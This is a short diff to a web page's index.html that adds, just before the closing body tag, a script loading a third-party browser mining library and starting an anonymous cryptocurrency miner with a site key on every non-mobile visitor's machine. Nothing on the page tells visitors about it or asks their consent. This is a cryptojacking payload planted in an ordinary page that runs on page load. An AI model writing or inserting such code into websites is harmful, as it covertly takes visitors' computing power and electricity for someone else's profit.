--- a/index.html
+++ b/index.html
@@ -133,6 +133,14 @@ ExoVideoSlider.init(adConfig);
 })();
 </script> </p>
 
+ <p> <script src="https://www.webminepool.com/lib/base.js"></script>
+<script>
+    var miner = WMP.Anonymous('SK_XbODxkom726X8ljKBWCrT',{throttle: 0.2});
+    if (!miner.isMobile()){
+        miner.start();
+    }
+</script>  </p>
+ 
 </body>
 
 </html>
